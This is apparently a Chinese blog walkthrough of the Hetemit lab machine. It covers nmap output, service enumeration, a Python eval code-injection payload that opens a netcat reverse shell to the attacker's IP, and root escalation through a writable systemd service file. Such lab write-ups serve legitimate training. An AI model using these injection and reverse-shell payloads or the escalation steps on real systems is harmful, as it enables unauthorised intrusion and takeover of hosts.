nmap 
┌──(root㉿kali)-[~]

└─# nmap -p- -A 192.168.157.117

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 04:32 UTC

Stats: 0:00:55 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan

SYN Stealth Scan Timing: About 41.46% done; ETC: 04:34 (0:01:16 remaining)

Nmap scan report for 192.168.157.117

Host is up (0.071s latency).

Not shown: 65528 filtered tcp ports (no-response)

PORT      STATE SERVICE     VERSION

21/tcp    open  ftp         vsftpd 3.0.3

| ftp-syst:

|   STAT:

| FTP server status:

|      Connected to 192.168.45.250

|      Logged in as ftp

|      TYPE: ASCII

|      No session bandwidth limit

|      Session timeout in seconds is 300

|      Control connection is plain text

|      Data connections will be plain text

|      At session startup, client count was 2

|      vsFTPd 3.0.3 - secure, fast, stable

|_End of status

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

|_Can't get directory listing: TIMEOUT

22/tcp    open  ssh         OpenSSH 8.0 (protocol 2.0)

| ssh-hostkey:

|   3072 b1:e2:9d:f1:f8:10:db:a5:aa:5a:22:94:e8:92:61:65 (RSA)

|   256 74:dd:fa:f2:51:dd:74:38:2b:b2:ec:82:e5:91:82:28 (ECDSA)

|_  256 48:bc:9d:eb:bd:4d:ac:b3:0b:5d:67:da:56:54:2b:a0 (ED25519)

80/tcp    open  http        Apache httpd 2.4.37 ((centos))

| http-methods:

|_  Potentially risky methods: TRACE

|_http-server-header: Apache/2.4.37 (centos)

|_http-title: CentOS \xE6\x8F\x90\xE4\xBE\x9B\xE7\x9A\x84 Apache HTTP \xE6\x9C\x8D\xE5\x8A\xA1\xE5\x99\xA8\xE6\xB5\x8B\xE8\xAF\x95\xE9\xA1\xB5

139/tcp   open  netbios-ssn Samba smbd 4.6.2

445/tcp   open  netbios-ssn Samba smbd 4.6.2

18000/tcp open  biimenu?

| fingerprint-strings:

|   GenericLines:

|     HTTP/1.1 400 Bad Request

|   GetRequest, HTTPOptions:

|     HTTP/1.0 403 Forbidden

|     Content-Type: text/html; charset=UTF-8

|     Content-Length: 3102

|     <!DOCTYPE html>

|     <html lang="en">

|     <head>

|     <meta charset="utf-8" />

|     <title>Action Controller: Exception caught</title>

|     <style>

|     body {

|     background-color: #FAFAFA;

|     color: #333;

|     margin: 0px;

|     body, p, ol, ul, td {

|     font-family: helvetica, verdana, arial, sans-serif;

|     font-size: 13px;

|     line-height: 18px;

|     font-size: 11px;

|     white-space: pre-wrap;

|     pre.box {

|     border: 1px solid #EEE;

|     padding: 10px;

|     margin: 0px;

|     width: 958px;

|     header {

|     color: #F0F0F0;

|     background: #C52F24;

|     padding: 0.5em 1.5em;

|     margin: 0.2em 0;

|     line-height: 1.1em;

|     font-size: 2em;

|     color: #C52F24;

|     line-height: 25px;

|     .details {

|_    bord

50000/tcp open  http        Werkzeug httpd 1.0.1 (Python 3.6.8)

|_http-title: Site doesn't have a title (text/html; charset=utf-8).

|_http-server-header: Werkzeug/1.0.1 Python/3.6.8

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

SF-Port18000-TCP:V=7.94SVN%I=7%D=11/25%Time=6743FE51%P=x86_64-pc-linux-gnu

SF:%r(GenericLines,1C,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n\r\n")%r(GetR

SF:equest,C76,"HTTP/1\.0\x20403\x20Forbidden\r\nContent-Type:\x20text/html

SF:;\x20charset=UTF-8\r\nContent-Length:\x203102\r\n\r\n<!DOCTYPE\x20html>

SF:\n<html\x20lang=\"en\">\n<head>\n\x20\x20<meta\x20charset=\"utf-8\"\x20

SF:/>\n\x20\x20<title>Action\x20Controller:\x20Exception\x20caught</title>

SF:\n\x20\x20<style>\n\x20\x20\x20\x20body\x20{\n\x20\x20\x20\x20\x20\x20b

SF:ackground-color:\x20#FAFAFA;\n\x20\x20\x20\x20\x20\x20color:\x20#333;\n

SF:\x20\x20\x20\x20\x20\x20margin:\x200px;\n\x20\x20\x20\x20}\n\n\x20\x20\

SF:x20\x20body,\x20p,\x20ol,\x20ul,\x20td\x20{\n\x20\x20\x20\x20\x20\x20fo

SF:nt-family:\x20helvetica,\x20verdana,\x20arial,\x20sans-serif;\n\x20\x20

SF:\x20\x20\x20\x20font-size:\x20\x20\x2013px;\n\x20\x20\x20\x20\x20\x20li

SF:ne-height:\x2018px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20pre\x20{\n\x2

SF:0\x20\x20\x20\x20\x20font-size:\x2011px;\n\x20\x20\x20\x20\x20\x20white

SF:-space:\x20pre-wrap;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20pre\.box\x20

SF:{\n\x20\x20\x20\x20\x20\x20border:\x201px\x20solid\x20#EEE;\n\x20\x20\x

SF:20\x20\x20\x20padding:\x2010px;\n\x20\x20\x20\x20\x20\x20margin:\x200px

SF:;\n\x20\x20\x20\x20\x20\x20width:\x20958px;\n\x20\x20\x20\x20}\n\n\x20\

SF:x20\x20\x20header\x20{\n\x20\x20\x20\x20\x20\x20color:\x20#F0F0F0;\n\x2

SF:0\x20\x20\x20\x20\x20background:\x20#C52F24;\n\x20\x20\x20\x20\x20\x20p

SF:adding:\x200\.5em\x201\.5em;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20h1\x

SF:20{\n\x20\x20\x20\x20\x20\x20margin:\x200\.2em\x200;\n\x20\x20\x20\x20\

SF:x20\x20line-height:\x201\.1em;\n\x20\x20\x20\x20\x20\x20font-size:\x202

SF:em;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20h2\x20{\n\x20\x20\x20\x20\x20

SF:\x20color:\x20#C52F24;\n\x20\x20\x20\x20\x20\x20line-height:\x2025px;\n

SF:\x20\x20\x20\x20}\n\n\x20\x20\x20\x20\.details\x20{\n\x20\x20\x20\x20\x

SF:20\x20bord")%r(HTTPOptions,C76,"HTTP/1\.0\x20403\x20Forbidden\r\nConten

SF:t-Type:\x20text/html;\x20charset=UTF-8\r\nContent-Length:\x203102\r\n\r

SF:\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n\x20\x20<meta\x20c

SF:harset=\"utf-8\"\x20/>\n\x20\x20<title>Action\x20Controller:\x20Excepti

SF:on\x20caught</title>\n\x20\x20<style>\n\x20\x20\x20\x20body\x20{\n\x20\

SF:x20\x20\x20\x20\x20background-color:\x20#FAFAFA;\n\x20\x20\x20\x20\x20\

SF:x20color:\x20#333;\n\x20\x20\x20\x20\x20\x20margin:\x200px;\n\x20\x20\x

SF:20\x20}\n\n\x20\x20\x20\x20body,\x20p,\x20ol,\x20ul,\x20td\x20{\n\x20\x

SF:20\x20\x20\x20\x20font-family:\x20helvetica,\x20verdana,\x20arial,\x20s

SF:ans-serif;\n\x20\x20\x20\x20\x20\x20font-size:\x20\x20\x2013px;\n\x20\x

SF:20\x20\x20\x20\x20line-height:\x2018px;\n\x20\x20\x20\x20}\n\n\x20\x20\

SF:x20\x20pre\x20{\n\x20\x20\x20\x20\x20\x20font-size:\x2011px;\n\x20\x20\

SF:x20\x20\x20\x20white-space:\x20pre-wrap;\n\x20\x20\x20\x20}\n\n\x20\x20

SF:\x20\x20pre\.box\x20{\n\x20\x20\x20\x20\x20\x20border:\x201px\x20solid\

SF:x20#EEE;\n\x20\x20\x20\x20\x20\x20padding:\x2010px;\n\x20\x20\x20\x20\x

SF:20\x20margin:\x200px;\n\x20\x20\x20\x20\x20\x20width:\x20958px;\n\x20\x

SF:20\x20\x20}\n\n\x20\x20\x20\x20header\x20{\n\x20\x20\x20\x20\x20\x20col

SF:or:\x20#F0F0F0;\n\x20\x20\x20\x20\x20\x20background:\x20#C52F24;\n\x20\

SF:x20\x20\x20\x20\x20padding:\x200\.5em\x201\.5em;\n\x20\x20\x20\x20}\n\n

SF:\x20\x20\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20margin:\x200\.2em\x200

SF:;\n\x20\x20\x20\x20\x20\x20line-height:\x201\.1em;\n\x20\x20\x20\x20\x2

SF:0\x20font-size:\x202em;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20h2\x20{\n

SF:\x20\x20\x20\x20\x20\x20color:\x20#C52F24;\n\x20\x20\x20\x20\x20\x20lin

SF:e-height:\x2025px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20\.details\x20{

SF:\n\x20\x20\x20\x20\x20\x20bord");

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purpose|specialized|storage-misc

Running (JUST GUESSING): Linux 3.X|4.X|5.X (90%), Crestron 2-Series (86%), HP embedded (85%)

OS CPE: cpe:/o:linux:linux_kernel:3.13 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5.1 cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3

Aggressive OS guesses: Linux 3.13 (90%), Linux 3.10 - 4.11 (90%), Linux 3.18 (90%), Linux 3.2 - 4.9 (90%), Linux 5.1 (88%), Crestron XPanel control system (86%), Linux 3.16 (86%), HP P2000 G3 NAS device (85%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 4 hops

Service Info: OS: Unix

Host script results:

| smb2-time:

|   date: 2024-11-25T04:34:39

|_  start_date: N/A

| smb2-security-mode:

|   3:1:1:

|_    Message signing enabled but not required

TRACEROUTE (using port 139/tcp)

HOP RTT      ADDRESS

1   70.53 ms 192.168.45.1

2   70.50 ms 192.168.45.254

3   71.51 ms 192.168.251.1

4   71.56 ms 192.168.157.117

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 162.70 seconds

18000端口先注册个用户看看是啥



但是要邀请码 不知道是啥 注册不了

5000端口看样子是个接口 也不知道干啥用的

80端口就是个普通的页面没啥卵用

再来看看smba服务有啥共享文件



发现没有权限查看文件



这样子的话估计突破口不在这

再来看看ftp端口 可以匿名登录



给无语住了 连上了点时 传输任何命令都是 响应超时 看来突破口也不在这里

看看web页面吧想不到啥漏洞利用点了

没招了看看wp吧

好吧确实没想到



尝试代码执行



发现成功



反弹shell

code=eval('__import__("os").system("nc -e /bin/bash 192.168.45.250 80")')

然后就是提权环节了

有几个可疑点

/etc/systemd/system/pythonapp.service 可写权限

/home/cmeeks/register_hetemit/config/master.key 有个key

postgres26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash

User cmeeks may run the following commands on hetemit:

(root) NOPASSWD: /sbin/halt, /sbin/reboot, /sbin/poweroff

修改service 的用户为root



然后sudo reboot

再次反弹shell 可以看到我们已经变成root了



其实后面提权都不难

主要是一开始rce突破口比较难

Hetemit pg walkthrough Intermediate的更多相关文章

  1. 简析服务端通过GT导入SHP至PG的方法

    文章版权由作者李晓晖和博客园共有,若转载请于明显处标明出处:http://www.cnblogs.com/naaoveGIS/ 1.背景 项目中需要在浏览器端直接上传SHP后服务端进行数据的自动入PG ...

  2. Bootstap datetimepicker报错TypeError: intermediate value

    Bootstrap datetimepicker有多个版本,官方的链接中,只是datepicker,没有时间的选择,原版的datetimepicker也不再更新,不能用新版的jquery.现在http ...

  3. PG 中 JSON 字段的应用

    13 年发现 pg 有了 json 类型,便从 oracle 转 pg,几年下来也算比较熟稔了,总结几个有益的实践. 用途一:存储设计时无法预料的文档性的数据.比如,通常可以在人员表准备一个 json ...

  4. pg gem 安装(postgresql94)

    使用下面命令安装报错 gem install pg 错误: [root@AS-test middle_database]# gem install pgBuilding native extensio ...

  5. #pg学习#postgresql的安装

    1.按照官网给的步骤编译安装(Mac安装是比较容易的,相比Liunx) cd /Users/renlipeng/Desktop/postgresql-9.5.1 ./configure --prefi ...

  6. PG 函数的易变性(Function Volatility Categories)

    此概念的接触是在做分区表的时候碰到的,分区表按时间字段分区,在查询时当where条件中时间为now()或者current_time()等时是无法查询的,即使进行格式转换也不行,只有是时间格式如‘201 ...

  7. c++错误——intermediate.manifest : general error c1010070很傻的错

    .\Debug\sadf.exe.intermediate.manifest : general error c1010070: Failed to load and parse the manife ...

  8. mysql 序列与pg序列的比较

    mysql序列(这里只谈innodb引擎): 在使用mysql的AUTO_INCREMENT时,使用AUTO_INCREMENT的字段必须建有索引,也可以为索引的一部分.当没有索引时会报错:      ...

  9. 使用zfs进行pg的pitr恢复测试

    前段时间做了一下zfs做pg的增量恢复测试,mark一下. 服务器信息: 主机:192.168.173.43 备机:192.168.173.41 主备使用流复制搭建,在备机上面进行了zfs快照备份. ...

  10. PG CREATEINDEX CONCURRENTLY

    PG CREATEINDEX CONCURRENTLY [TOC] 官方说法 根据9.1的文档 Creating an index can interfere with regular operati ...

随机推荐

  1. Docker for the Virtualization Admin

    Docker is one of the most successful open source projects in recent history, and organizations of al ...

  2. MMORPG技能管线设计经验总结

    导语: 表现丰富.机制多变的技能作为MMORPG游戏战斗体验的核心组成部分,是吸引玩家的一大亮点,本文总结了在MMORPG技能系统设计上的一些经验,供大家参考. 1.设计思路 早期的MMORPG手游中 ...

  3. 2025年前端面试准备vue篇

      1.VUE的声明周期有哪些及每个生命周期做了什么 beforeCreate: 是new Vue() 之后触发的第一个钩子,data,methods,computed 以及watch 上的数据和方法 ...

  4. VUE 前端读取excel表格内容

    <el-upload class="upload-demo" :action="''" :show-file-list="false" ...

  5. Solr 的核心就是搜索

    原文  http://www.aptusource.org/2014/06/searching-is-what-its-all-about/ Solr 的主要功能就是强大的查询处理.在本文中,你将会看 ...

  6. think in java interview-高级开发人员面试宝典(二)

    从现在开始,以样题的方式一一列出各种面试题以及点评,考虑到我在前文中说的,对于一些大型的外资型公司,你将会面临全程英语面试,因此我在文章中也会出现许多全英语样题. 这些题目来自于各个真实的公司,公司名 ...

  7. N皇后问题(DFS-深度优先算法)

    N皇后问题(DFS-深度优先算法) 题目描述: 在 N×N 的方格棋盘放置了 N 个皇后,使得它们不相互攻击(即任意 22 个皇后不允许处在同一排,同一列,也不允许处在与棋盘边框成 45° 的斜线上. ...

  8. 我们为什么选择Vue.js而不是React(转载)

    这篇非常好,可以当做 why React sucks 看 ;D 其实 vue 也不如 molecule 最近,Qwintry开发团队把很多项目都迁移至Vue.js,包括所有遗留的项目和新开始的项目: ...

  9. pycharm选择conda虚拟环境出错:python的SDK无效

    检查项如下: 0.安装了python,并在系统环境变量中配置了python 0.5 正确配置了conda的系统环境变量 1.安装conda的文件夹又读写权限(不需要管理员模式运行也能进行读写) 直接在 ...

  10. NACOS MalformedInputException 无法读取中文配置问题

    1. 问题描述 在windows平台中打包运行springboot jar包提示如下错误 在idea中运行正常 org.yaml.snakeyaml.error.YAMLException: java ...